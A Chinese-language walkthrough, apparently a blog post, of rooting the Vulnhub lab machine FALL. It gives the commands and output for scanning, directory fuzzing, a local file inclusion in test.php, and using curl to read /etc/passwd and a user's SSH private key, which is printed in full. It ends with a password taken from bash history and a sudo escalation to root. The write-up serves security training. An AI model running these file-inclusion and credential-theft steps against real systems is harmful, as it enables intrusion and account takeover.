digital world.local:FALL Vulnhub 演練
FALL (digitalworld.local: FALL) 是 Donavan 為 Vulnhub 打造的一款中型機器。這款實驗室非常適合經驗豐富的 CTF 玩家,他們希望在這類環境中檢驗自己的技能。那么,讓我們開始吧,看看如何將問題分解成易于管理的部分。
1.網絡掃描
1.1 首先,netdiscover 無法確定受害 PC 的 IP 地址。當我們啟動計算機時,屏幕上會顯示其 IP 地址。
Currently scanning: Finished! | Screen View: Unique Hosts 46646 Captured ARP Req/Rep packets, from 5 hosts. Total size: 2798760 _____________________________________________________________________________IP At MAC Address Count Len MAC Vendor / Hostname -----------------------------------------------------------------------------192.168.74.1 00:50:56:c0:00:08 40563 2433780 VMware, Inc. 192.168.74.2 00:50:56:eb:d3:ae 4600 276000 VMware, Inc. 192.168.74.133 00:0c:29:bc:f0:36 908 54480 VMware, Inc. 192.168.74.254 00:50:56:ec:6c:1a 574 34440 VMware, Inc. 0.0.0.0 00:0c:29:bc:f0:36 1 60 VMware, Inc. ┌──(root?kali)-[~]
└─# netdiscover -r 192.168.74.0/24
1.2 在我們的場景中,受害者 PC 的 IP 地址是192.168.74.133。為了推進此過程,我們啟動了 Nmap。我們運行了一次激進掃描 ( -A ) 來枚舉開放端口,并發現了以下端口,如下圖所示。
根據nmap掃描的結果,這臺機器正在運行各種各樣的服務。
┌──(root?kali)-[~]
└─# nmap -A 192.168.74.133
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 11:12 EDT
Nmap scan report for 192.168.74.133
Host is up (0.00038s latency).
Not shown: 979 filtered tcp ports (no-response), 10 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey:
| 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
| 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
111/tcp closed rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-title: Good Tech Inc's Fall Sales - Home
| tls-alpn:
|_ http/1.1
| http-robots.txt: 1 disallowed entry
|_/
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after: 2020-08-19T05:31:33
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
445/tcp open netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
9090/tcp open http Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://192.168.74.133:9090/
MAC Address: 00:0C:29:BC:F0:36 (VMware)
Aggressive OS guesses: Linux 5.0 - 5.14 (98%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (98%), Linux 4.15 - 5.19 (94%), OpenWrt 21.02 (Linux 5.4) (94%), Linux 2.6.32 - 3.13 (93%), Linux 5.1 - 5.15 (93%), Linux 6.0 (93%), Linux 2.6.39 (93%), OpenWrt 22.03 (Linux 5.10) (93%), Linux 4.19 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 2h20m00s, deviation: 4h02m31s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-05-29T15:12:42
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.8.10)
| Computer name: fall
| NetBIOS computer name: FALL\x00
| Domain name: \x00
| FQDN: fall
|_ System time: 2025-05-29T08:12:42-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.74.133OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.65 seconds┌──(root?kali)-[~]
└─#
2.枚舉
2.1 首先,我們嘗試使用 HTTP。我們來查看 80 端口,看看是否有任何值得注意的發現。我們可以立即在瀏覽器中驗證這一點,因為 Apache 服務器正在監聽 80 端口。除了我們發現一個用戶名“ qiu ”之外,沒有什么特別的發現。
2.2 現在,我們將嘗試使用 gobuster,看看能否在這臺機器上找到一些可以讓我們繼續前進的東西。它是一個用于暴力破解網站中的 URI(目錄和文件)、DNS 子域(支持通配符)以及目標 Web 服務器上的虛擬主機名的程序。
gobuster dir -u http://192.168.74.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
上述命令將枚舉所有具有 .html、.php、.txt 擴展名的文件。
┌──(root?kali)-[~]
└─# gobuster dir -u http://192.168.74.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.74.133
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 214]
/index.php (Status: 200) [Size: 8385]
/modules (Status: 301) [Size: 238] [--> http://192.168.74.133/modules/]
/uploads (Status: 301) [Size: 238] [--> http://192.168.74.133/uploads/]
/doc (Status: 301) [Size: 234] [--> http://192.168.74.133/doc/]
/admin (Status: 301) [Size: 236] [--> http://192.168.74.133/admin/]
/assets (Status: 301) [Size: 237] [--> http://192.168.74.133/assets/]
/test.php (Status: 200) [Size: 80]
/lib (Status: 301) [Size: 234] [--> http://192.168.74.133/lib/]
/config.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 79]
/error.html (Status: 200) [Size: 80]
/tmp (Status: 301) [Size: 234] [--> http://192.168.74.133/tmp/]
/missing.html (Status: 200) [Size: 168]
/.html (Status: 403) [Size: 214]
/phpinfo.php (Status: 200) [Size: 17]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================┌──(root?kali)-[~]
└─#
2.3 我們發現了一個值得信賴的目錄 (test.php)。我立即打開瀏覽器查看。如上所述,當我們訪問 /test.php 時,會收到一條警報。它聲稱缺少一個 GET 參數。因此,我們現在只有幾種可能性。
3.滲透
3.1 由于我一無所知,所以對 LFI 產生了懷疑。于是我使用 FUZZ 對 /etc/passwd 文件進行模糊測試,以確認 LFI 的存在。借助以下命令,我嘗試對缺少的 Get 參數進行模糊測試。
https://github.com/danielmiessler/SecLists/tree/master
┌──(kali?kali)-[~]
└─$ unzip SecLists.zip
┌──(root?kali)-[~/304]
└─# ffuf -c -w /home/kali/SecLists/Discovery/Web-Content/common.txt -u 'http://192.168.74.133/test.php?FUZZ=/etc/passwd' -fs 80/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev
________________________________________________:: Method : GET:: URL : http://192.168.74.133/test.php?FUZZ=/etc/passwd:: Wordlist : FUZZ: /home/kali/SecLists/Discovery/Web-Content/common.txt:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 40:: Matcher : Response status: 200-299,301,302,307,401,403,405,500:: Filter : Response size: 80
________________________________________________file [Status: 200, Size: 1633, Words: 36, Lines: 33, Duration: 1ms]
:: Progress: [4746/4746] :: Job [1/1] :: 3636 req/sec :: Duration: [0:00:01] :: Errors: 0 ::┌──(root?kali)-[~/304]
└─# 3.2 對于可能缺少術語的“file”參數,我們得到了 200 OK。我們使用 curl 命令調出遠程計算機的 /etc/passwd 文件。
┌──(root?kali)-[~/304]
└─# curl http://192.168.74.133/test.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cockpit-ws:x:997:993:User for cockpit-ws:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:996:991::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
qiu:x:1000:1000:qiu:/home/qiu:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:995:990:Nginx web server:/var/lib/nginx:/sbin/nologin
tss:x:59:59:Account used by the tpm2-abrmd package to sandbox the tpm2-abrmd daemon:/dev/null:/sbin/nologin
clevis:x:994:989:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false┌──(root?kali)-[~/304]
└─#
3.3 我們不難看出,用戶名“ qiu ”擁有更高權限的用戶賬戶,并且還擁有bash授權。
現在是時候開始 LFI 漏洞利用了。在探索目錄之后,我們利用 LFI,借助 curl 命令枚舉了用戶qiu的 ssh id_rsa 密鑰。
┌──(root?kali)-[~/304]
└─# curl http://192.168.74.133/test.php?file=/home/qiu/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAvNjhOFOSeDHy9K5vnHSs3qTjWNehAPzT0sD3beBPVvYKQJt0AkD0
FDcWTSSF13NhbjCQm5fnzR8td4sjJMYiAl+vAKboHne0njGkBwdy5PgmcXyeZTECIGkggX
61kImUOIqtLMcjF5ti+09RGiWeSmfIDtTCjj/+uQlokUMtdc4NOv4XGJbp7GdEWBZevien
qXoXtG6j7gUgtXX1Fxlx3FPhxE3lxw/AfZ9ib21JGlOyy8cflTlogrZPoICCXIV/kxGK0d
Zucw8rGGMc6Jv7npeQS1IXU9VnP3LWlOGFU0j+IS5SiNksRfdQ4mCN9SYhAm9mAKcZW8wS
vXuDjWOLEwAAA9AS5tRmEubUZgAAAAdzc2gtcnNhAAABAQC82OE4U5J4MfL0rm+cdKzepO
NY16EA/NPSwPdt4E9W9gpAm3QCQPQUNxZNJIXXc2FuMJCbl+fNHy13iyMkxiICX68Apuge
d7SeMaQHB3Lk+CZxfJ5lMQIgaSCBfrWQiZQ4iq0sxyMXm2L7T1EaJZ5KZ8gO1MKOP/65CW
iRQy11zg06/hcYlunsZ0RYFl6+J6epehe0bqPuBSC1dfUXGXHcU+HETeXHD8B9n2JvbUka
U7LLxx+VOWiCtk+ggIJchX+TEYrR1m5zDysYYxzom/uel5BLUhdT1Wc/ctaU4YVTSP4hLl
KI2SxF91DiYI31JiECb2YApxlbzBK9e4ONY4sTAAAAAwEAAQAAAQArXIEaNdZD0vQ+Sm9G
NWQcGzA4jgph96uLkNM/X2nYRdZEz2zrt45TtfJg9CnnNo8AhhYuI8sNxkLiWAhRwUy9zs
qYE7rohAPs7ukC1CsFeBUbqcmU4pPibUERes6lyXFHKlBpH7BnEz6/BY9RuaGG5B2DikbB
8t/CDO79q7ccfTZs+gOVRX4PW641+cZxo5/gL3GcdJwDY4ggPwbU/m8sYsyN1NWJ8NH00d
X8THaQAEXAO6TTzPMLgwJi+0kj1UTg+D+nONfh7xeXLseST0m1p+e9C/8rseZsSJSxoXKk
CmDy69aModcpW+ZXl9NcjEwrMvJPLLKjhIUcIhNjf4ABAAAAgEr3ZKUuJquBNFPhEUgUic
ivHoZH6U82VyEY2Bz24qevcVz2IcAXLBLIp+f1oiwYUVMIuWQDw6LSon8S72kk7VWiDrWz
lHjRfpUwWdzdWSMY6PI7EpGVVs0qmRC/TTqOIH+FXA66cFx3X4uOCjkzT0/Es0uNyZ07qQ
58cGE8cKrLAAAAgQDlPajDRVfDWgOWJj+imXfpGsmo81UDaYXwklzw4VM2SfIHIAFZPaA0
acm4/icKGPlnYWsvZCksvlUck+ti+J2RS2Mq9jmKB0AVZisFazj8qIde3SPPwtR7gBR329
JW3Db+KISMRIvdpJv+eiKQLg/epbSdwXZi0DJoB0a15FsIAQAAAIEA0uQl0d0p3NxCyT/+
Q6N+llf9TB5+VNjinaGu4DY6qVrSHmhkceHtXxG6h9upRtKw5BvOlSbTatlfMZYUtlZ1mL
RWCU8D7v1Qn7qMflx4bldYgV8lf18sb6g/uztWJuLpFe3Ue/MLgeJ+2TiAw9yYoPVySNK8
uhSHa0dvveoJ8xMAAAAZcWl1QGxvY2FsaG9zdC5sb2NhbGRvbWFpbgEC
-----END OPENSSH PRIVATE KEY-----3.4 讓我們嘗試 SSH 連接,但首先,我們必須將此密鑰保存在我們的機器上,并授予必要的權限。那么,讓我們開始 SSH 登錄……
成功登錄SSH后,我們開始提升權限。
┌──(root?kali)-[~/304]
└─# nano sshkey304┌──(root?kali)-[~/304]
└─# ls
sshkey304┌──(root?kali)-[~/304]
└─# chmod 600 sshkey304 ┌──(root?kali)-[~/304]
└─# ssh -i sshkey304 qiu@192.168.74.133
The authenticity of host '192.168.74.133 (192.168.74.133)' can't be established.
ED25519 key fingerprint is SHA256:EKK1u2kbhexzA1ZV6xNgdbmDeKiF8lfhmk+8sHl47DY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.74.133' (ED25519) to the list of known hosts.
Web console: https://FALL:9090/ or https://192.168.74.133:9090/Last login: Sun Sep 5 19:28:51 2021
[qiu@FALL ~]$ ls -al
total 24
drwxr-xr-x. 3 qiu qiu 128 May 21 2021 .
drwxr-xr-x. 3 root root 17 Aug 14 2019 ..
-rw------- 1 qiu qiu 292 Sep 5 2021 .bash_history
-rw-r--r--. 1 qiu qiu 18 Mar 15 2018 .bash_logout
-rw-r--r--. 1 qiu qiu 193 Mar 15 2018 .bash_profile
-rw-r--r--. 1 qiu qiu 231 Mar 15 2018 .bashrc
-rw-r--r-- 1 qiu qiu 27 May 21 2021 local.txt
-rw-rw-r-- 1 qiu qiu 38 May 21 2021 reminder
drwxr-xr-x 2 qiu qiu 61 May 21 2021 .ssh3.5 權限提升
我們現在要做的就是檢查 bash 歷史記錄并找到一些有價值的信息。
我們獲得了用戶“ qiu ”和密碼“ remarkablyawesome ”,并運行了sudo命令來檢查該用戶的權限。
sudo -l
用戶“qiu”已被授予成為root用戶所需的所有權限。我們只需切換用戶帳戶并提交上面列出的密碼即可。
萬歲!現在我們有了根目錄,我們必須導航到根目錄才能獲取根標志。
[qiu@FALL ~]$ cat .bash_history
ls -al
cat .bash_history
rm .bash_history
echo "remarkablyawesomE" | sudo -S dnf update
ifconfig
ping www.google.com
ps -aux
ps -ef | grep apache
env
env > env.txt
rm env.txt
lsof -i tcp:445
lsof -i tcp:80
ps -ef
lsof -p 1930
lsof -p 2160
rm .bash_history
exit
ls -al
cat .bash_history
exit
[qiu@FALL ~]$
[qiu@FALL ~]$ sudo -l
[sudo] password for qiu:
Matching Defaults entries for qiu on FALL:!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENTLC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser qiu may run the following commands on FALL:(ALL) ALL
[qiu@FALL ~]$ sudo su
[root@FALL qiu]# cd /root
[root@FALL ~]# cat proof.txt
Congrats on a root shell! :-)
[root@FALL ~]#
這就是我們深入機器核心的方法。這是一次非常棒的練習,而且大家一起加油也很有趣。為了理解各種場景,有必要嘗試一下。
)
)
)
)
